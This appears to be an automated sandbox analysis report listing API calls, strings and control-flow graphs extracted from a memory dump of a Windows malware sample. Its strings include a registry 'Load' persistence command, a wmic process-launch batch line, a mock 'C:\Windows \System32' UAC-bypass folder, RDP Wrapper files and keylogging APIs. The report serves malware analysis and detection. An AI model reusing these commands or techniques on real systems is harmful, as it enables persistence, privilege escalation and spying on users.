                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000008,?,004030E2,00405B80,?,?,0041191C,00405B80,?,?,77C30770,00000000,?,00405B80,00000000), ref: 00406048
                                                                            • RtlAllocateHeap.NTDLL(00000000,?,0041191C,00405B80,?,?,77C30770,00000000,?,00405B80,00000000), ref: 0040604F
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$AllocateProcess
                                                                            • String ID:
                                                                            • API String ID: 1357844191-0
                                                                            • Opcode ID: 23e14b04ba23bb0a7572a9d137d38e85150c57062142801fbe0a0820d84e1829
                                                                            • Instruction ID: 8cf45ecabbe94aee1392de7f34d48094c70ab4a430d8d374c6facdf70f7c2239
                                                                            • Opcode Fuzzy Hash: 23e14b04ba23bb0a7572a9d137d38e85150c57062142801fbe0a0820d84e1829
                                                                            • Instruction Fuzzy Hash: C0A002715541005BDE5467A49F0DF553639B748701F0485947145C5060DBB454458776
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 0041551D
                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00415539
                                                                              • Part of subcall function 004134A2: CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?,?,00415553), ref: 004134CF
                                                                              • Part of subcall function 004134A2: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00415553), ref: 004134E2
                                                                              • Part of subcall function 004134A2: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,00415553), ref: 004134F3
                                                                              • Part of subcall function 004134A2: FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000000,?,?,00415553), ref: 00413500
                                                                              • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                                                              • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004155A0
                                                                            • GetLastError.KERNEL32 ref: 004155AB
                                                                            • RegCreateKeyExA.KERNELBASE(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 004155E5
                                                                            • RegSetValueExA.KERNELBASE(?,MaxConnectionsPer1_0Server,00000000,00000004,?,00000004), ref: 00415604
                                                                            • RegSetValueExA.KERNELBASE(?,MaxConnectionsPerServer,00000000,00000004,?,00000004), ref: 00415619
                                                                            • RegCloseKey.ADVAPI32(?), ref: 0041561F
                                                                            • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?,?,?,?), ref: 0041567B
                                                                            • lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 0041568E
                                                                            • CreateDirectoryW.KERNELBASE(?,00000000), ref: 0041569D
                                                                              • Part of subcall function 00412F55: CloseHandle.KERNEL32(?,00000000,?,?,0040555F,?,?,00000000,00000000,?,?,?,00405909,?,00000000,00000000), ref: 00412F7F
                                                                              • Part of subcall function 00412F55: Wow64DisableWow64FsRedirection.KERNEL32(?,00000000,00000000,?,?,?,00405909,?,00000000,00000000,?,?,?,?,?,?), ref: 00412F99
                                                                              • Part of subcall function 00412F55: GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,?,?,?,?,?,00405909,?,00000000,00000000), ref: 00412FBE
                                                                              • Part of subcall function 00412F55: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00412FE3
                                                                              • Part of subcall function 00412F55: lstrcatW.KERNEL32(?,\winSAT.exe), ref: 00412FF7
                                                                              • Part of subcall function 00412F55: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0041301B
                                                                              • Part of subcall function 00412F55: lstrcatW.KERNEL32(?,\winmm.dll), ref: 00413029
                                                                              • Part of subcall function 00412F55: CreateDirectoryW.KERNEL32(\\?\C:\Windows \,00000000), ref: 00413039
                                                                              • Part of subcall function 00412F55: CreateDirectoryW.KERNEL32(\\?\C:\Windows \System32,00000000), ref: 00413041
                                                                              • Part of subcall function 00412F55: CopyFileW.KERNEL32(?,\\?\C:\Windows \System32\winSAT.exe,00000000), ref: 00413056
                                                                              • Part of subcall function 00412F55: CopyFileW.KERNEL32(?,\\?\C:\Windows \System32\winmmd.dll,00000000), ref: 00413065
                                                                              • Part of subcall function 00412F55: RegSetValueExW.ADVAPI32(00000000,Virtual Machine Platform,00000000,00000001,?,00001000), ref: 00413083
                                                                              • Part of subcall function 00412F55: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405909), ref: 0041308A
                                                                              • Part of subcall function 00412F55: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405909), ref: 00413094
                                                                              • Part of subcall function 004126DC: CopyFileW.KERNEL32(?,?,00000000,?,004176A4,?,00000000,?,?,?,?,00000000,77C30770,00000000), ref: 0041277D
                                                                              • Part of subcall function 0040373F: lstrcpyW.KERNEL32 ref: 00403769
                                                                              • Part of subcall function 004120F8: CreateProcessW.KERNEL32 ref: 00412133
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            Strings
                                                                            • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 004155DB
                                                                            • \Microsoft Vision\, xrefs: 00415681
                                                                            • MaxConnectionsPerServer, xrefs: 00415610
                                                                            • MaxConnectionsPer1_0Server, xrefs: 004155FB
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$Create$Directory$Close$CopyProcessValuelstrcat$HeapModuleNameSystemWow64$AllocateChangeCountCurrentDisableErrorEventFindFolderFreeHandleLastNotificationPathReadRedirectionSizeTickVirtuallstrcpy
                                                                            • String ID: MaxConnectionsPer1_0Server$MaxConnectionsPerServer$Software\Microsoft\Windows\CurrentVersion\Internet Settings$\Microsoft Vision\
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 004109A0: GetModuleFileNameW.KERNEL32(00000000,00000000,000007D0,?,00000000,?VA,?,00412BF1,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,InitWindows), ref: 004109C1
                                                                              • Part of subcall function 00412514: RegCreateKeyExW.KERNELBASE(80000001,00000000,00000000,00000000,00000001,00000001,00000000,?,00000000,77C30770,?,?,0041270B,?,?), ref: 00412534
                                                                              • Part of subcall function 00412554: RegCloseKey.KERNELBASE(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,004176A4,?,00000000,?,?,?,?,00000000,77C30770,00000000), ref: 0041277D
                                                                              • Part of subcall function 00412612: RegCreateKeyExW.ADVAPI32(77C30770,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,?VA,?,00412B64,80000001,?), ref: 00412646
                                                                              • Part of subcall function 00412612: RegOpenKeyExW.KERNELBASE(77C30770,00000000,00000000,?,?,?,?,?VA,?,00412B64,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 00412661
                                                                              • Part of subcall function 004125DF: RegSetValueExW.ADVAPI32(?,000F003F,00000000,80000001,?,?,?,?,004127D2,?,?,00000003,80000001,?,000F003F,00000000), ref: 004125FE
                                                                            • SHGetKnownFolderPath.SHELL32(00417570,00000000,00000000,?,?,?,?,?,00000000,77C30770,00000000), ref: 0041280A
                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,:start,?,0041A074,wmic process call create '",00000000,?,?,?,:start,") do %%A,for /F "usebackq tokens=*" %%A in ("), ref: 00412928
                                                                              • Part of subcall function 00410C8A: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000,?,?,?), ref: 00410CBB
                                                                              • Part of subcall function 00403549: lstrcpyW.KERNEL32 ref: 0040356E
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                              • Part of subcall function 00410C3E: SHCreateDirectoryExW.SHELL32(00000000,?,00000000,0041274C,00000000,?,?,?,?,00000000,77C30770,00000000), ref: 00410C44
                                                                              • Part of subcall function 0040373F: lstrcpyW.KERNEL32 ref: 00403769
                                                                              • Part of subcall function 00403447: lstrcatW.KERNEL32(00000000,77C30770), ref: 00403477
                                                                            • WinExec.KERNEL32 ref: 00412A20
                                                                            • DeleteFileW.KERNELBASE(?,00000000,:Zone.Identifier,?,?,?,?,?,00000000,77C30770,00000000), ref: 00412A55
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$Create$CopyFolderPathlstrcpy$CloseDeleteDirectoryExecFreeKnownModuleNameOpenSpecialValueVirtuallstrcat
                                                                            • String ID: ") do %%A$:ApplicationData$:Zone.Identifier$:start$\programs.bat$cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "$for /F "usebackq tokens=*" %%A in ("$wmic process call create '"
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • InitializeCriticalSection.KERNEL32(0055AD18), ref: 0040E5B0
                                                                              • Part of subcall function 00406099: GetProcessHeap.KERNEL32(00000000,000000F4,00411996,?,77C30770,00000000,00405B72), ref: 0040609C
                                                                              • Part of subcall function 00406099: HeapAlloc.KERNEL32(00000000), ref: 004060A3
                                                                              • Part of subcall function 004032E6: ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 00403319
                                                                              • Part of subcall function 00403549: lstrcpyW.KERNEL32 ref: 0040356E
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$AllocCriticalEnvironmentExpandFreeInitializeProcessSectionStringsVirtuallstrcpy
                                                                            • String ID: %ProgramFiles%$%ProgramW6432%$%windir%\System32$TermService$\Microsoft DN1$\rdpwrap.ini$\rfxvmt.dll$\sqlmap.dll
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • InitializeCriticalSection.KERNEL32(0055A808,?,00401251), ref: 00409138
                                                                            • LoadLibraryW.KERNEL32(User32.dll,?,00401251), ref: 00409163
                                                                              • Part of subcall function 00411E88: lstrcmpA.KERNEL32(?,Q2A,?,open,00413251), ref: 00411EC1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalInitializeLibraryLoadSectionlstrcmp
                                                                            • String ID: GetRawInputData$MapVirtualKeyA$ToUnicode$User32.dll
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 327 40594b-4059a0 call 403237 call 41178e getaddrinfo 332 4059a2-4059bb socket 327->332 333 4059ff 327->333 332->333 334 4059bd-4059fa htons freeaddrinfo connect 332->334 335 405a01-405a0f call 405feb 333->335 336 405a12-405a21 ReleaseMutex 334->336 337 4059fc 334->337 336->335 337->333
                                                                            APIs
                                                                              • Part of subcall function 00403237: lstrcatA.KERNEL32(00000000,77C30770,?,00000000,?,004036D6,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 00403263
                                                                              • Part of subcall function 0041178E: WaitForSingleObject.KERNEL32(?,000000FF,00405974,77C30770,?,?,00000000,00404FB9,?,?,?,?,?,00000000,77C30770), ref: 00411792
                                                                            • getaddrinfo.WS2_32(77C30770,00000000,00404FB9,00000000), ref: 00405998
                                                                            • socket.WS2_32(00000002,00000001,00000000), ref: 004059AF
                                                                            • htons.WS2_32(00000000), ref: 004059D5
                                                                            • freeaddrinfo.WS2_32(00000000), ref: 004059E5
                                                                            • connect.WS2_32(?,?,00000010), ref: 004059F1
                                                                            • ReleaseMutex.KERNEL32(?), ref: 00405A1B
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MutexObjectReleaseSingleWaitconnectfreeaddrinfogetaddrinfohtonslstrcatsocket
                                                                            • String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 410 405e28-405e3b GetCommandLineA 411 405e65-405e67 410->411 412 405e3d-405e42 410->412 415 405e62-405e63 411->415 416 405e69 411->416 413 405e44 412->413 414 405e55-405e60 412->414 417 405e46-405e4a 413->417 418 405e70 414->418 415->411 419 405e72-405e74 416->419 417->414 422 405e4c-405e53 417->422 418->419 420 405e76-405ea2 GetStartupInfoA call 405eb6 call 405ee3 GetModuleHandleA call 4154eb 419->420 421 405e6b-405e6d 419->421 429 405ea7-405eaf call 405ecb ExitProcess 420->429 421->420 424 405e6f 421->424 422->414 422->417 424->418
                                                                            APIs
                                                                            • GetCommandLineA.KERNEL32 ref: 00405E2F
                                                                            • GetStartupInfoA.KERNEL32(?), ref: 00405E7E
                                                                            • GetModuleHandleA.KERNEL32(00000000), ref: 00405E9A
                                                                            • ExitProcess.KERNEL32 ref: 00405EAF
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                            • String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 432 4134a2-4134da call 401085 CreateFileA 435 4134dc 432->435 436 4134df-4134fb GetFileSize ReadFile 432->436 435->436 437 4134fd 436->437 438 4134ff-41350c FindCloseChangeNotification 436->438 437->438
                                                                            APIs
                                                                              • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                                                              • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                                                            • CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?,?,00415553), ref: 004134CF
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00415553), ref: 004134E2
                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,00415553), ref: 004134F3
                                                                            • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000000,?,?,00415553), ref: 00413500
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$Heap$AllocateChangeCloseCreateFindNotificationProcessReadSize
                                                                            • String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 439 41111b-41113c GetCurrentProcess OpenProcessToken 440 41115e-411162 439->440 441 41113e-41115a GetTokenInformation 439->441 442 411164-411167 FindCloseChangeNotification 440->442 443 41116d-411176 440->443 441->440 442->443
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,77C30770,00000000,77C30770,00000000,?,?,?,?,0041563F,?), ref: 0041112D
                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0041563F,?), ref: 00411134
                                                                            • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,0041563F,?), ref: 00411152
                                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00411167
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ProcessToken$ChangeCloseCurrentFindInformationNotificationOpen
                                                                            • String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 444 412612-412622 445 412624-412630 call 410c50 444->445 446 412657-412669 RegOpenKeyExW 444->446 445->446 452 412632-41264e RegCreateKeyExW 445->452 448 41266b-41266c 446->448 449 41266e 446->449 451 412670-412674 448->451 449->451 452->449 453 412650-412652 call 412554 452->453 453->446
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNELBASE(77C30770,00000000,00000000,?,?,?,?,?VA,?,00412B64,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 00412661
                                                                              • Part of subcall function 00410C50: RegOpenKeyExW.ADVAPI32(77C30770,00000000,00000000,00020019,00000000,77C30770,?,0041262E,?,?,?VA,?,00412B64,80000001,?,000F003F), ref: 00410C66
                                                                            • RegCreateKeyExW.ADVAPI32(77C30770,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,?VA,?,00412B64,80000001,?), ref: 00412646
                                                                              • Part of subcall function 00412554: RegCloseKey.KERNELBASE(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Open$CloseCreate
                                                                            • String ID: ?VA
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • Sleep.KERNELBASE(000001F4,00000000,77C30770,00000000), ref: 00405B64
                                                                              • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,77C30770,?,00405B8D,.bss,00000000), ref: 004034DA
                                                                              • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,?,00405B8D,.bss,00000000), ref: 004034E7
                                                                              • Part of subcall function 004034D1: lstrcpyA.KERNEL32(00000000,?,?,00405B8D,.bss,00000000), ref: 004034FA
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                              • Part of subcall function 00403549: lstrcpyW.KERNEL32 ref: 0040356E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrcpylstrlen$FreeSleepVirtual
                                                                            • String ID: .VA$.bss
                                                                            • API String ID: 277671435-4282314365
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0040319E: lstrlenA.KERNEL32(00000000,004031C6,77C30770,00000000,00000000, 6@,004033EE, 6@,00000000,-00000001,77C30770,?,00403620,00000000,?,?), ref: 004031A5
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,-00000002,00000000,00000000,77C30770,00000000,00000000, 6@,004033EE, 6@,00000000,-00000001,77C30770), ref: 004031DC
                                                                              • Part of subcall function 00405F68: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,004034F4,?,00405B8D,.bss,00000000), ref: 00405F76
                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,00403620,00000000,?,?,77C30770,00000000), ref: 00403207
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                              • Part of subcall function 00403549: lstrcpyW.KERNEL32 ref: 0040356E
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrlen$ByteCharMultiVirtualWide$AllocDispatcherExceptionFreeUserlstrcpy
                                                                            • String ID: 6@
                                                                            • API String ID: 2128046513-952913687
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 00405F68: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,004034F4,?,00405B8D,.bss,00000000), ref: 00405F76
                                                                            • lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrlen$AllocDispatcherExceptionUserVirtual
                                                                            • String ID:
                                                                            • API String ID: 4104320610-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                                                              • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                                                            • GetModuleFileNameW.KERNEL32(00000000,00000000,000007D0,?,00000000,?VA,?,00412BF1,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,InitWindows), ref: 004109C1
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                              • Part of subcall function 00403549: lstrcpyW.KERNEL32 ref: 0040356E
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                              • Part of subcall function 00401099: GetProcessHeap.KERNEL32(00000000,00000000,00413499,00000000,00000000,00000000,00000000,.bss,00000000), ref: 0040109F
                                                                              • Part of subcall function 00401099: RtlFreeHeap.NTDLL(00000000), ref: 004010A6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$FreeProcesslstrlen$AllocateDispatcherExceptionFileModuleNameUserVirtuallstrcpy
                                                                            • String ID: ?VA
                                                                            • API String ID: 3831115454-1028452459
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00403373: lstrlenW.KERNEL32(77C30770,00403758,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,77C30770,00000000), ref: 0040337A
                                                                            • lstrcatW.KERNEL32(00000000,77C30770), ref: 00403477
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrcatlstrlen
                                                                            • String ID: ?VA
                                                                            • API String ID: 1475610065-1028452459
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00403373: lstrlenW.KERNEL32(77C30770,00403758,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,77C30770,00000000), ref: 0040337A
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00404FB1,?), ref: 00403693
                                                                              • Part of subcall function 00405FFA: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00403764,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,77C30770,00000000), ref: 00406004
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 004036BE
                                                                              • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,77C30770,?,00405B8D,.bss,00000000), ref: 004034DA
                                                                              • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,?,00405B8D,.bss,00000000), ref: 004034E7
                                                                              • Part of subcall function 004034D1: lstrcpyA.KERNEL32(00000000,?,?,00405B8D,.bss,00000000), ref: 004034FA
                                                                              • Part of subcall function 00403237: lstrcatA.KERNEL32(00000000,77C30770,?,00000000,?,004036D6,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 00403263
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrlen$ByteCharMultiVirtualWide$AllocFreelstrcatlstrcpy
                                                                            • String ID:
                                                                            • API String ID: 346377423-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • lstrcmpA.KERNEL32(?,Q2A,?,open,00413251), ref: 00411EC1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrcmp
                                                                            • String ID: Q2A
                                                                            • API String ID: 1534048567-2123675874
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
